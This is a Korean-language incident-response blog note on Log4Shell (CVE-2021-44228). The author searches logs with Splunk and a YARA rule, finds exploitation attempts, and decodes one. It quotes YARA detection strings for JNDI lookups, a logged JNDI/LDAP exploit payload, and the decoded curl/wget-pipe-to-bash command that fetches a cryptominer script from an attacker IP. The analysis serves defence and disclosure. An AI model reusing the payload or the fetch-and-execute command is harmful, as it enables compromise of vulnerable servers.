
CVE-2021-44228 DFIR 노트
집에 운전해서 가는 중에 #log4shell 취약점에 대한 첫 메시지가 흘러들어오기 시작했습니다.
2021년 12월 9일, Apache Log4j 2 유틸리티의 여러 버전에 영향을 미치는 높은 심각도의 취약점(CVE-2021-44228)이 프로젝트의 GitHub를 통해 공개적으로 공개되었습니다. 알리바바 클라우드 보안 팀의 Chen Zhaojun이 발견한 이 취약점은 Apache Log4j 2 버전 2.0부터 2.14.1까지 영향을 미칩니다.
집에 도착하자마자 바로 뛰어들었습니다. 평소처럼 Splunk4tw.
첫 번째 개념 증명 익스플로잇이 GitHub에 게시된 후, 공격자들은 인증이 필요 없는 원격으로 악용 가능한 이 보안 결함에 취약한 시스템을 찾기 위해 인터넷을 스캔하기 시작했습니다. 아래에서 볼 수 있는 것은 그러한 스캔 및 익스플로잇 시도의 일부입니다.
가장 먼저 한 일은 누군가 초기 YARA 규칙을 내놓았는지 확인하는 것이었습니다. 여기서 찾았습니다: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (감사합니다 Florian Roth)
다음과 같은 탐지 문자열을 언급하고 있습니다:
strings:
$x1 = "${jndi:ldap:/"
$x2 = "${jndi:rmi:/"
$x3 = "${jndi:ldaps:/"
$x4 = "${jndi:dns:/"
두렵지 않습니다.....CPU를 좀 갈아서 최악의 Splunk 검색으로 바로 마무리합시다.
index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")
IIS 로그와 Windows 이벤트 로그(일부 수정됨)에서 몇 가지 히트가 있었고, 방화벽 로그에서 많은 차단된 시도가 있었습니다....
IIS:

WINEVENTLOG:

IP 주소 45.155.205.233 확인 중....러시아 상트페테르부르크....정말 놀랍군요.

발견된 문자열은 고전적인 교과서적인 난독화된 인코딩 악성 문자열처럼 보입니다. 무슨 일을 하는지 살펴봅시다:
cyberchef를 사용하여 Base64 문자열을 디코딩해 보겠습니다.
2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash
Curl...셸 스크립트 실행, bash....OMG. 이 지저분한 코드가 무슨 일을 할지 감이 오기 시작합니다....
샌드박스에서 curl 명령을 실행해 보겠습니다:

368줄의 코드입니다. (전체 스크립트를 보고 싶다면 여기서 실행하세요 --> https://reqbin.com/c-ipejxywd)
일부 발췌:

그리고 끝난 후에는 로그 파일까지 삭제합니다...정말 놀랍군요:

기본적으로 Kingsin이라는 크립토 마이너 악성코드를 설치하려고 시도합니다. 대상은 nix 시스템입니다. 익스플로잇이 다양한 페이로드를 실행하는 데 사용될 것이므로 시스템을 반드시 패치하세요.
금요일 저녁에 왓츠앱으로 이 문제에 대해 토론해준 동료들 Martijn (Umbrio)과 Rob [redacted]에게 감사드립니다. 00:09, 잘 시간입니다.
#업데이트 및 좋은 자료#
